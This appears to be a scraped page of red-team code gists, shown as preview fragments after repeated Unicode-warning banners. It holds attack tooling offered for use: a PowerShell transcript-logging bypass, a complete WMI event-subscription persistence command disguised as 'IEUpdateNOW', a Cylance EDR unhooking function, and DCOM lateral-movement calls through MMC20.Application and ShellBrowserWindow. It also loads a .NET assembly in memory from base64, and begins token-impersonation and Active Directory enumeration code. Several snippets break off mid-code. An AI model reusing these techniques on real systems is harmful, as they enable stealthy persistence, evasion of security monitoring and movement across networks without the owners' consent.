This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; | |
using System.Management.Automation.Security; | |
using System.Management.Automation.Runspaces; | |
using System.Reflection; | |
namespace TranscriptBypass | |
{ | |
// Compiling with CSC.exe v4.0.30319 or v3.5 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
([Security.Principal.WindowsIdentity]::GetCurrent()); | |
$tl=@{Expression={((New-Object System.Security.Principal.SecurityIdentifier($_.Value)).Translate([System.Security.Principal.NTAccount])).Value};Label="Group Name";Width=400}; ([Security.Principal.WindowsIdentity]::GetCurrent()).Groups | FT $tl |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='IEUpdateNOW';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 9 AND TargetInstance.Minute= 30 GROUP WITHIN 60"}; $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{ name='IEUpdateNOW';CommandLineTemplate="powershell -e blah";RunInteractively='false'}; Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer} | |
#https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows- | |
Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless- | |
Backdoor-wp.pdf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Unhook-Cylance() { | |
$winapi = @" | |
using System.Runtime.InteropServices; | |
using System; | |
public class Win32 { | |
[DllImport("msvcrt.dll", EntryPoint = "memcpy", CallingConvention = CallingConvention.Cdecl, SetLastError = false)] | |
public static extern IntPtr memcpy(IntPtr dest, string src, uint count); | |
[DllImport("kernel32")] | |
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# MMC (Tested Windows 7, Windows 10, Server 2012R2): | |
dynamic c = Activator.CreateInstance(Type.GetTypeFromProgID("MMC20.Application", "127.0.0.1")); | |
c.Document.ActiveView.ExecuteShellCommand(@"C:\Windows\System32\cmd.exe",null,"/c notepad.exe", "7"); | |
## Detection: svchost.exe -DCOMLaunch (parent cmdline) -> mmc.exe (process) | |
# ShellBrowserWindow (Tested Windows 10, Server 2012R2): | |
System.Type com = Type.GetTypeFromCLSID(Guid.Parse("C08AFD90-F2A1-11D1-8455-00A0C91F3880"), "127.0.0.1"); | |
dynamic obj = System.Activator.CreateInstance(com); | |
obj.Document.Application.ShellExecute("notepad.exe","","c:\\windows",null,0); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add-Type -TypeDefinition @" | |
using System; | |
using System.Runtime.InteropServices; | |
using System.Security.Principal; | |
public static class Advapi32 | |
{ | |
[DllImport("advapi32.dll", SetLastError = true)] | |
public static extern bool LogonUser(string pszUsername, string pszDomain, string pszPassword, int dwLogonType, int dwLogonProvider, ref IntPtr phToken); | |
[DllImport("advapi32.dll", SetLastError=true)] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Load C# Module in PS | |
[System.Reflection.Assembly]::LoadFile("C:\Temp\StandIn.exe") | |
# Load C# Module in PS from Base64 Blob | |
$dllbytes = [System.Convert]::FromBase64String("fdsfdsfds") | |
[System.Reflection.Assembly]::Load($dllbytes) | |
# Execute C# Module in PS | |
$Mods=[System.AppDomain]::CurrentDomain.GetAssemblies() | |
foreach ($Mod in $Mods){if ($Mod.FullName -like "StandIn*") {$Mod.EntryPoint.Invoke($null,@(,[string[]]@(""))) }} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
namespace GetAPICall | |
{ | |
class Program | |
{ | |
const uint PROCESS_ALL_ACCESS = 0x000F0000 | 0x00100000 | 0xFFF; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Collections.Generic; | |
using System.Diagnostics.Eventing.Reader; | |
using System.Text.RegularExpressions; | |
using System.Threading; | |
namespace EventLogSearcher | |
{ | |
class Program | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Collections.Generic; | |
using System.Management; | |
using System.DirectoryServices; | |
using System.DirectoryServices.ActiveDirectory; | |
using System.Text; | |
using System.Runtime.Serialization.Formatters.Binary; | |
using System.IO; | |
using System.Collections; | |
using System.Runtime.InteropServices; |